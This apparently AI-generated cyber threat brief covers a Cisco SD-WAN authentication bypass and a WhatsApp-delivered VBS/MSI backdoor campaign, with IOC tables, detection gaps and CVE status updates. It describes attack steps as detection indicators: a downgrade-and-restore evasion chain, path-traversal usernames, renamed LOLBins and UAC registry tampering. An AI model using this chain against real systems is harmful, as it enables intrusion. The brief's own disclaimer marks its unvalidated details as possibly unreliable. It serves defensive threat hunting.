Cyber Threat Brief — April 5 2026
⚠️ This report is AI-generated. Always validate findings.
1. Cisco SD-WAN Auth Bypass Gets Metasploit Module + Five Eyes Hunt Guide — CVE-2026-20127
TL;DR: A CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN Controller/Manager now has a public Metasploit module (sfewer-r7) and a Five Eyes co-signed IOC hunt guide. UAT-8616 has exploited this since 2023 for fabric-level persistence.
What’s New:
- Metasploit auxiliary module merged March 20 via sfewer-r7/CVE-2026-20127; second PoC by zerozenxlabs also public
- Five Eyes (ACSC/NCSC) hunt guide released with behavioral IOCs for SD-WAN control-plane compromise
- Post-exploitation chain: rogue peer addition → NETCONF (port 830) manipulation → software version downgrade to re-exploit CVE-2022-20775 for root → version restore to evade detection
- Affects Catalyst SD-WAN Controller (vSmart) and Manager (vManage); tested on v20.15.3
- No lateral movement outside SD-WAN components observed, but full fabric config control achieved
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
Accepted publickey for vmanage-admin from unknown IP | Log entry | T1078.001 | /var/log/auth.log | Hunt — validate all vmanage-admin SSH sessions |
| Unrecognized system IPs in SD-WAN Manager WebUI | Config anomaly | T1199 | SD-WAN Manager UI / API | Hunt — audit peer list against known inventory |
| Software version downgrade + reboot sequence | Behavioral | T1601.001 | /var/volatile/log/sw_script_synccdb.log, /var/log/tmplog/vdebug | Hunt — alert on any unscheduled downgrade |
Path traversal in username (/../../) | Exploit artifact | T1068 | /var/log/auth.log | Block/Alert — CVE-2022-20775 escalation indicator |
| NETCONF sessions on port 830 from unauthorized IPs | Network | T1021 | Firewall/NetFlow | Block — restrict NETCONF to management VLAN |
| New local user account creation | Persistence | T1136.001 | SD-WAN Manager audit logs | Alert — correlate with change management |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None specific | Need: SD-WAN peering event anomaly detection, vmanage-admin auth from untrusted IPs |
| Elastic | None specific | Need: Cisco SD-WAN log parsing + behavioral rules for downgrade-reboot sequences |
| Sigma | None specific | Need: Generic auth.log rules for publickey from unauthorized sources, path traversal in usernames |
Sources: Rapid7 PoC · Cisco Talos UAT-8616 · Greenbone Advisory · SOCRadar Analysis
2. WhatsApp VBS/MSI Backdoor Campaign Leverages LOLBins for Persistent Access
TL;DR: Microsoft disclosed a campaign delivering malicious VBS files via WhatsApp messages that chains renamed LOLBins, cloud-hosted payloads, and unsigned MSI packages to establish persistent remote access on Windows endpoints.
What’s New:
- Microsoft Defender Experts published full attack chain analysis March 31; campaign active since late February 2026
- VBS files drop renamed Windows utilities into
C:\ProgramDatahidden folders:curl.exe→netapi.dll,bitsadmin.exe→sc.exe - Payloads retrieved from AWS, Tencent Cloud, and Backblaze B2 to evade domain-based blocking
- Malicious MSI packages (
Setup.msi,WinRAR.msi,LinkPoint.msi,AnyDesk.msi) install remote access tools - UAC bypass via registry tampering under
HKLM\Software\Microsoft\Win; OriginalFileName PE metadata mismatch is primary detection signal
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
curl.exe renamed as netapi.dll in C:\ProgramData | File rename | T1036.005 | Sysmon EID 1/11 | Alert — OriginalFileName ≠ process name |
bitsadmin.exe renamed as sc.exe in C:\ProgramData | File rename | T1036.005 | Sysmon EID 1/11 | Alert — OriginalFileName mismatch |
Setup.msi, WinRAR.msi, LinkPoint.msi, AnyDesk.msi | MSI payload | T1218.007 | Sysmon EID 1, Windows Installer logs | Block — unsigned MSI from temp/ProgramData paths |
Hidden folders in C:\ProgramData | Staging | T1564.001 | Sysmon EID 11 | Hunt — new hidden dirs under ProgramData |
Trojan:VBS/Obfuse.KPP!MTB, Trojan:VBS/BypassUAC.PAA!MTB | Defender sigs | T1059.005 | Defender/MDE alerts | Alert — existing coverage |
Registry writes to HKLM\Software\Microsoft\Win UAC keys | Persistence | T1548.002 | Sysmon EID 13 | Alert — UAC setting tampering |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Windows System Binary Proxy Execution (partial) | Need: specific OriginalFileName vs. actual filename mismatch for LOLBin renames |
| Elastic | Renamed Binary Execution (partial) | Need: MSI execution from ProgramData/hidden paths |
| Sigma | proc_creation_win_renamed_binary.yml | Covers OriginalFileName mismatch — verify deployed and tuned |
Sources: Microsoft Security Blog · Malwarebytes Analysis · CSO Online
Status Updates
- CVE-2026-20131 (Cisco FMC): Interlock ransomware exploitation ongoing; no new IOCs or detection rules since initial coverage. Original brief.
- CVE-2026-20093 (Cisco IMC): CVSS 9.8 auth bypass patched April 1-2; still no public PoC or ITW exploitation. Monitor for PoC release. Original brief.
- CVE-2026-5281 (Chrome Dawn): CISA KEV deadline April 15; no attribution or new IOCs. Verify Chrome ≥146.0.7680.178 across fleet. Original brief.
- UAT-10608 React2Shell (CVE-2025-55182): Talos reports exploitation ongoing; 766+ hosts compromised. Attacker IPs unchanged. Original brief.